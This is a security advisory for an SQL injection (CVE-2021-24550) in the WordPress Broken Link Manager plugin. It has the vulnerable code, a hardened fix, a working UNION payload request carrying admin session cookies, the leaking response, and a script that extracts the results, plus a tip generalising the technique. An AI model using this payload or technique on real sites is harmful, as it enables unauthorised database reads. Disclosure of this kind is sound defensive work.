Wp Plugin Broken Link Manager

Plugin Details

Plugin Name: wp-plugin : broken-link-manager
Affected Version : 0.6.5 (and most probably lower versions, if any)
Vulnerability : SQL Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24550
Identified by : Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The edit-URL page of the plugin loads the record to be edited via a GET request. The GET parameter url is not sanitised, escaped or validated before it is concatenated into a SQL statement, leading to SQL injection. The statement is a plain string concatenation, so the value is spliced in as SQL rather than bound as an integer.

Vulnerable Code: wblm-url-edit.php#L4

2:$url = $_GET['url'];
3:global $wpdb;
4:$urlInfo = $wpdb->get_row("SELECT * FROM " . TABLE_WBLM . " where id = $url");
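The following hardened version of the same lookup is an added example written for this advisory; it is not the plugin's own patch. It assumes the WordPress environment of the original file ($wpdb, absint(), wp_die()) and the plugin's TABLE_WBLM constant.

```php
<?php
// Added example: hardened form of the lookup in wblm-url-edit.php.
// Not the plugin's patched code; assumes the WordPress globals and helpers
// ($wpdb, absint, wp_die) and the plugin's TABLE_WBLM constant exist.

// The id column is an integer, so coerce the parameter to a non-negative
// integer before it gets anywhere near SQL. For the payload used below,
// "-4966 UNION ALL SELECT ...", (int) casting keeps only the leading "-4966"
// and absint() turns it into 4966: everything after the number is dropped.
$url_id = isset( $_GET['url'] ) ? absint( $_GET['url'] ) : 0;
if ( 0 === $url_id ) {
    wp_die( 'Invalid link id.' );
}

global $wpdb;

// $wpdb->prepare() binds the value through the %d placeholder, so even a
// string that survived the cast could not be interpreted as SQL.
$urlInfo = $wpdb->get_row(
    $wpdb->prepare( 'SELECT * FROM ' . TABLE_WBLM . ' WHERE id = %d', $url_id )
);

if ( null === $urlInfo ) {
    wp_die( 'No such link.' );
}
```

The table name still comes from the constant rather than from user input, which is what makes the concatenation on the left side of the statement acceptable; only the right side ever carried attacker-controlled data.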

PoC Screenshot

broken-link-manager-poc

broken-link-manager-poc-1

Exploit

GET /wp-admin/admin.php?page=wblm-edit-url&url=-4966 UNION ALL SELECT NULL,CONCAT(0x7178707071,0x5753787a67454c546c6e6d66756c705351734975516a636f6a5a615966724c627247697646625768,0x717a7a7171),current_user(),NULL,NULL,NULL,NULL-- - HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=wblm-redirect
Accept-Language: en-US,en;q=0.9
Cookie: spf-last-metabox-tab-12-_sptp_generator=_sptp_generator_1; spf-last-metabox-tab-14-_sptp_generator=_sptp_generator_1; wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Ce8b173e02d87095d6cd04209dbfeda32a85a82d72b684e5e4db9e8da3c25c610; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1619288085; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Cb4cc1181f3020f37b67c5d7020c67fffbd647bfa363a2f07198baf1189be58db; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619611876; ignored_html_tags=1; manage_settings=1
Connection: close

Response

name="url" value="-4966 UNION ALL SELECT NULL,CONCAT(0x7178707071,0x5753787a67454c546c6e6d66756c705351734975516a636f6a5a615966724c627247697646625768,0x717a7a7171),current_user(),NULL,NULL,NULL,NULL-- -">
							<div class="form-group">
								<label for="inputEmail3" class="col-sm-1 control-label">Old Url</label>
								<div class="col-sm-8">
									<input type="text" class="form-control" id="old_url" name="old_url" placeholder="http://" value="qxppqWSxzgELTlnmfulpSQsIuQjcojZaYfrLbrGivFbWhqzzqq">
								</div>
							</div>
							<div class="form-group">
								<label for="inputPassword3" class="col-sm-1 control-label">New Url </label>
								<div class="col-sm-8">
									<input type="text" class="form-control" id="new_url" name="new_url" placeholder="http://" value="bob@localhost">
							</div>
						</div>
					</div>
					<!-- form-horizontal -->   
				</div>
				<!-- /.panel-body -->
			</div>
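To make the request/response pair above easier to read, here is an added example (not part of the original advisory or of the plugin) that decodes the hex literals in the UNION payload and pulls the injected values back out of the form fields in the response. The HTML it parses is a constructed copy of the two input elements shown in the response.

```php
<?php
// Added example: decode the UNION payload markers and locate the injected
// values in the response. Illustrative code for this advisory, not plugin code.

// Constructed excerpt of the response shown above (the two affected inputs).
$response = <<<'HTML'
<input type="text" class="form-control" id="old_url" name="old_url" placeholder="http://" value="qxppqWSxzgELTlnmfulpSQsIuQjcojZaYfrLbrGivFbWhqzzqq">
<input type="text" class="form-control" id="new_url" name="new_url" placeholder="http://" value="bob@localhost">
HTML;

// CONCAT(0x7178707071, <random>, 0x717a7a7171) wraps a random string in two
// hex-encoded markers so the result can be found reliably inside arbitrary HTML.
$prefix = hex2bin( '7178707071' );  // "qxppq"
$suffix = hex2bin( '717a7a7171' );  // "qzzqq"

// Return the value attribute of the input whose name attribute matches.
function extract_field( string $html, string $name ): ?string {
    $pattern = '/name="' . preg_quote( $name, '/' ) . '"[^>]*value="([^"]*)"/';
    return preg_match( $pattern, $html, $m ) ? $m[1] : null;
}

// Return the text between the two markers, or null if either is missing.
function between_markers( ?string $haystack, string $prefix, string $suffix ): ?string {
    if ( null === $haystack ) {
        return null;
    }
    $start = strpos( $haystack, $prefix );
    if ( false === $start ) {
        return null;
    }
    $start += strlen( $prefix );
    $end = strpos( $haystack, $suffix, $start );
    return false === $end ? null : substr( $haystack, $start, $end - $start );
}

// The UNION supplies 7 columns to match SELECT * on TABLE_WBLM. The template
// renders column 2 (the CONCAT) into old_url and column 3 (current_user())
// into new_url, which is why the marker and the DB user show up in those fields.
$marker  = between_markers( extract_field( $response, 'old_url' ), $prefix, $suffix );
$db_user = extract_field( $response, 'new_url' );

printf( "injected marker : %s\n", $marker );   // WSxzgELTlnmfulpSQsIuQjcojZaYfrLbrGivFbWh
printf( "current_user()  : %s\n", $db_user );  // bob@localhost
```

The same marker technique works for any reflected UNION injection: pick a column that is echoed into the page, wrap the expression you want to read in two improbable strings, and search the response for the pair rather than for the value itself.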